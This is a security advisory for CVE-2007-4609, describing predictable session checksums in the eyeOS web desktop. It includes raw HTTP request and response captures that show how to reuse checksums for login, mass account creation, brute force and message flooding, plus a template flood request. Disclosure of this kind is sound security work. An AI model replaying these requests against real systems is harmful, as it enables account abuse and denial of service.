eyeOS checksum prediction

2007.09.01
Credit: komarov
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2007-4609
CWE: CWE-264


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Partial

Subject: eyeOS checksum prediction Author: Andrej Komarov (komarov (at) itdefence (dot) ru [email concealed]) eyeOS operates with special intermediate checksums in plaintext. Without its validation it is impossible to make new actions (to login, start new services). There is way to predict eyeOS checksum. If it is automated from hackers side, it will make local Denial Of Service atack or user password stealing. 1. GET / HTTP/1.1 >>>>>>> <body onload='sendMsg("758474843719") 2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1 >>>>>>> HTTP/1.1 200 OK Date: Mon, 27 Aug 2007 18:58:21 GMT Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=10, max=10 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/xml 21db <?xml version="1.0" encoding="UTF-8"?> <eyeMessage> <action> <task>createWidget</task> <position> <x>0</x> <y>0</y> <horiz>0</horiz> <vert>0</vert> </position> <checknum>876029936871</checknum> (!) <name>47631_wnd1</name> <father>eyeApps</father> ... widgets generation 3. POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!) Host: demo.eyeos.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; Referer: http://demo.eyeos.org/ Content-Length: 117 Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8 Pragma: no-cache Cache-Control: no-cache params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogi n_Password%3Edemo23%3C%2FeyeLogin_Password%3E 4. POST /index.php?checknum=876029936871&msg=successLogin HTTP/1.1 Host: demo.eyeos.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; Referer: http://demo.eyeos.org/ Content-Length: 7 Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8 Pragma: no-cache Cache-Control: no-cache >>> <checknum>749058867402</checknum> POST /index.php?checknum=432461038814&msg=Launch HTTP/1.1 POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1 On this method is based possible atacks: - mass user registration - bruteforce atacks - flood atacks on eyeBoard service like: POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1 params=%3Capp%3EeyeBoard%3C%2Fapp%3E with additional values : params=%3CMessageB%3EYOUR_MESSAGE%3C%2FMessageB%3E POST /index.php?checknum=326420826018&msg=doCreateUser HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; Referer: http://127.0.0.1:8080/ Content-Length: 161 Cookie: PHPSESSID=r9vivth7896gtbaj6bst0nlen7 Pragma: no-cache Cache-Control: no-cache params=%3CeyeLogin_newUser%3ESHALOMA%3C%2FeyeLogin_newUser%3E%3CeyeLogin _Pass1%3Eshaloma%3C%2FeyeLogin_Pass1%3E%3CeyeLogin_Pass2%3Eshaloma%3C%2F eyeLogin_Pass2%3E ----------------------- POST /index.php?checknum=284626275746&msg=doLogin HTTP/1.1 Accept: */* Accept-Language: ru Referer: http://127.0.0.1:8080/index.php Content-Type: application/x-www-form-urlencoded; Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706) Host: 127.0.0.1:8080 Content-Length: 105 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0 params=%3CeyeLogin_Username%3E%3C%2FeyeLogin_Username%3E%3CeyeLogin_Pass word%3E%3C%2FeyeLogin_Password%3E


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top